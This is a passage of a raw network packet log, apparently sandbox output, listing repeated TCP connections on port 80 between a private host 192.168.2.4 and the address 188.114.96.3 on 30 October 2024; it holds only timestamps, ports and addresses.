                                                        Oct 30, 2024 05:24:31.259691000 CET8050174188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.310796976 CET5017480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.455005884 CET8050174188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.496140003 CET5017480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.568397999 CET5017480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.570785046 CET5017580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.574222088 CET8050174188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.574917078 CET5017480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.576170921 CET8050175188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.579185963 CET5017580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.579288960 CET5017580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.584559917 CET8050175188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.793477058 CET5017580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.794785023 CET5017680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.800123930 CET8050176188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.800909996 CET5017680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.800909996 CET5017680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.806186914 CET8050176188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.842920065 CET8050175188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.916912079 CET5017780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.922290087 CET8050177188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.922354937 CET5017780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.922445059 CET5017780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.927804947 CET8050177188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.062247992 CET8050175188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.062305927 CET5017580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.152529001 CET5017680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.158142090 CET8050176188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.158159018 CET8050176188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.277461052 CET5017780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.282912016 CET8050177188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.410773039 CET8050176188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.464812994 CET5017680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.517329931 CET8050177188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.642281055 CET5017780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.724236965 CET8050176188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.724338055 CET8050176188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.724390984 CET5017680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.728512049 CET8050177188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.865170002 CET5017680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.865252972 CET5017780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.866343975 CET5017880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.870845079 CET8050176188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.870896101 CET5017680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.871368885 CET8050177188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.871412992 CET5017780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.871664047 CET8050178188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.871720076 CET5017880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.871874094 CET5017880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.877171993 CET8050178188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:33.230667114 CET5017880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:33.236141920 CET8050178188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:33.459433079 CET8050178188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:33.645888090 CET5017880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:33.985563040 CET8050178188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:33.985579014 CET8050178188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:33.985657930 CET5017880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:34.109709978 CET5017880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:34.110639095 CET5017980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:34.115390062 CET8050178188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:34.115436077 CET5017880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:34.115863085 CET8050179188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:34.115933895 CET5017980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:34.116043091 CET5017980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:34.121289015 CET8050179188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:34.464961052 CET5017980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:34.470374107 CET8050179188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:34.712635994 CET8050179188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:34.761686087 CET5017980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:35.010481119 CET8050179188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:35.058873892 CET5017980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:35.132802963 CET5018080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:35.138170958 CET8050180188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:35.138670921 CET5018080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:35.138870001 CET5018080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:35.144282103 CET8050180188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:35.496923923 CET5018080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:35.502264023 CET8050180188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:35.725440025 CET8050180188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:35.861990929 CET5018080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:35.957897902 CET8050180188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:36.134246111 CET5018080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:36.184633017 CET5018080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:36.191059113 CET8050180188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:36.191812992 CET5018080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:36.192150116 CET5018180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:36.197515011 CET8050181188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:36.199542999 CET5018180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:36.207350016 CET5018180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:36.212609053 CET8050181188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:36.558720112 CET5018180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:36.564126015 CET8050181188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:36.803929090 CET8050181188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:36.855470896 CET5018180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:36.996722937 CET8050181188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:37.042957067 CET5018180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.114708900 CET5017980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.115734100 CET5018180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.118875027 CET5018280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.121530056 CET8050181188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:37.121757030 CET5018180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.124301910 CET8050182188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:37.124372005 CET5018280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.124475002 CET5018280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.130101919 CET8050182188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:37.483165979 CET5018280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.488656998 CET8050182188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:37.731395006 CET5018280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.734805107 CET5018380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.736987114 CET8050182188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:37.737360001 CET5018280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.740127087 CET8050183188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:37.740216970 CET5018380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.740346909 CET5018380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.745590925 CET8050183188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:37.850933075 CET5018480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.856271029 CET8050184188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:37.856353998 CET5018480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.856498003 CET5018480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.861745119 CET8050184188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:38.090147018 CET5018380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:38.095568895 CET8050183188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:38.095916986 CET8050183188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:38.214988947 CET5018480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:38.220360994 CET8050184188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:38.337258101 CET8050183188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:38.414067030 CET5018380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:38.462440014 CET8050184188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:38.511749029 CET5018480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:38.648967981 CET8050183188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:38.680641890 CET8050184188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:38.730480909 CET5018480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:38.803601027 CET5018380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.087171078 CET5018380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.087593079 CET5018480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.091350079 CET5018580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.097100019 CET8050183188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:39.097647905 CET5018380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.097970963 CET8050184188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:39.098042011 CET5018480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.100980997 CET8050185188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:39.101536989 CET5018580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.101764917 CET5018580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.110048056 CET8050185188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:39.449322939 CET5018580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.454687119 CET8050185188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:39.709834099 CET8050185188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:39.886743069 CET5018580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.903039932 CET8050185188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:39.903085947 CET8050185188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:39.903198004 CET5018580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:40.034353018 CET5018580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:40.035494089 CET5018680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:40.040291071 CET8050185188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:40.040338993 CET5018580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:40.040786982 CET8050186188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:40.040844917 CET5018680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:40.040966988 CET5018680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:40.046894073 CET8050186188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:40.386975050 CET5018680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:40.392383099 CET8050186188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:57.747072935 CET8050207188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:57.747126102 CET5020880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:57.747251987 CET5020780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:57.752418995 CET8050208188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:58.105628014 CET5020880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:58.111030102 CET8050208188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:58.341829062 CET8050208188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:58.386780977 CET5020880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:58.544594049 CET8050208188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:58.589907885 CET5020880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:58.666330099 CET5020880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:58.667582989 CET5020980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:58.671866894 CET8050208188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:58.671906948 CET5020880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:58.672849894 CET8050209188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:58.672913074 CET5020980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:58.673005104 CET5020980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:58.678210974 CET8050209188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:59.027501106 CET5020980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:59.032818079 CET8050209188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:59.278403044 CET8050209188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:59.403079987 CET5020980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:59.475835085 CET8050209188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:59.475889921 CET8050209188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:59.475964069 CET5020980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:59.599895000 CET5021080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:59.605237961 CET8050210188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:59.605356932 CET5021080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:59.605472088 CET5021080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:59.610740900 CET8050210188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:59.951337099 CET5021080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:59.956696987 CET8050210188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:00.193118095 CET8050210188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:00.235724926 CET5021080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:00.388338089 CET8050210188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:00.471527100 CET5021080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:00.509068966 CET5021080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:00.510082960 CET5021180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:00.515721083 CET8050210188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:00.515769958 CET5021080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:00.517117023 CET8050211188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:00.517184019 CET5021180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:00.517308950 CET5021180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:00.523183107 CET8050211188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:00.871265888 CET5021180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:00.877028942 CET8050211188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.127054930 CET8050211188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.183687925 CET5021180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.294610977 CET5021180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.294631958 CET5021280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.415355921 CET5021380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.541915894 CET8050211188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.542124987 CET5021180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.542588949 CET8050212188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.542601109 CET8050213188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.542673111 CET5021380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.542678118 CET5021280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.543322086 CET8050211188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.543539047 CET5021180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.545155048 CET5021280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.545500994 CET8050211188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.546420097 CET5021380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.546504021 CET5021180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.551852942 CET8050212188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.551873922 CET8050213188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.906092882 CET5021380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.906100988 CET5021280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.911485910 CET8050213188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.911500931 CET8050212188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.911608934 CET8050212188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:02.135909081 CET8050213188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:02.169783115 CET8050212188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:02.183671951 CET5021380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.267266035 CET5021280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.382643938 CET8050212188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:02.456056118 CET8050213188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:02.496170044 CET5021380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.496193886 CET5021280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.570075989 CET5021280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.570231915 CET5021380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.570938110 CET5021480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.576054096 CET8050212188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:02.576148033 CET5021280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.576303005 CET8050214188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:02.576373100 CET5021480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.576448917 CET5021480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.577033043 CET8050213188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:02.577083111 CET5021380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.581690073 CET8050214188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:02.933820009 CET5021480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.939255953 CET8050214188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:03.179325104 CET8050214188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:03.230576038 CET5021480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:03.370086908 CET8050214188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:03.419116974 CET5021480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:03.490906000 CET5021580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:03.496320963 CET8050215188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:03.496603966 CET5021580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:03.496715069 CET5021580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:03.501952887 CET8050215188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:03.855652094 CET5021580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:03.861037016 CET8050215188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:04.085153103 CET8050215188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:04.137279987 CET5021580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:04.285214901 CET8050215188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:04.349585056 CET5021580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:04.406888008 CET5021580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:04.408098936 CET5021680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:04.412482977 CET8050215188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:04.412528038 CET5021580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:04.413382053 CET8050216188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:04.413443089 CET5021680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:04.413603067 CET5021680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:04.418833017 CET8050216188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:04.762100935 CET5021680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:04.767606974 CET8050216188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:05.017786026 CET8050216188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:05.076076031 CET5021680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:05.226632118 CET8050216188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:05.278903008 CET5021680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:05.352535009 CET5021680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:05.352539062 CET5021780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:05.357938051 CET8050217188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:05.358154058 CET5021780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:05.358154058 CET5021780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:05.358241081 CET8050216188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:05.359385967 CET5021680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:05.363534927 CET8050217188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:05.715126991 CET5021780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:05.720518112 CET8050217188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:05.956223965 CET8050217188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:06.034022093 CET5021780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:06.163146019 CET8050217188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:06.289697886 CET5021780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:06.290913105 CET5021880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:06.295538902 CET8050217188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:06.295589924 CET5021780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:06.296221018 CET8050218188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:06.296288013 CET5021880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:06.296394110 CET5021880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:06.301670074 CET8050218188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:06.652556896 CET5021880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:06.657970905 CET8050218188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:06.903122902 CET8050218188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.100133896 CET5021880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.241166115 CET8050218188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.241220951 CET8050218188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.241394997 CET5021880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.365750074 CET5021880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.365755081 CET5021980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.371130943 CET8050219188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.371579885 CET5021980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.371579885 CET5021980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.372061968 CET8050218188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.372126102 CET5021880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.377520084 CET8050219188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.388254881 CET5021980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.388261080 CET5022080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.393841028 CET8050220188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.394109964 CET5022080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.394165993 CET5022080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.399645090 CET8050220188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.438962936 CET8050219188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.511353970 CET5022180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.516765118 CET8050221188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.519076109 CET5022180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.519213915 CET5022180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.524604082 CET8050221188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.746364117 CET5022080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.751842022 CET8050220188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.751858950 CET8050220188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.867842913 CET8050219188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.871125937 CET5021980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.874979973 CET5022180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.880510092 CET8050221188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:08.023168087 CET8050220188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:08.105611086 CET5022080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.108381987 CET8050221188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:08.152446032 CET5022180192.168.2.4188.114.96.3
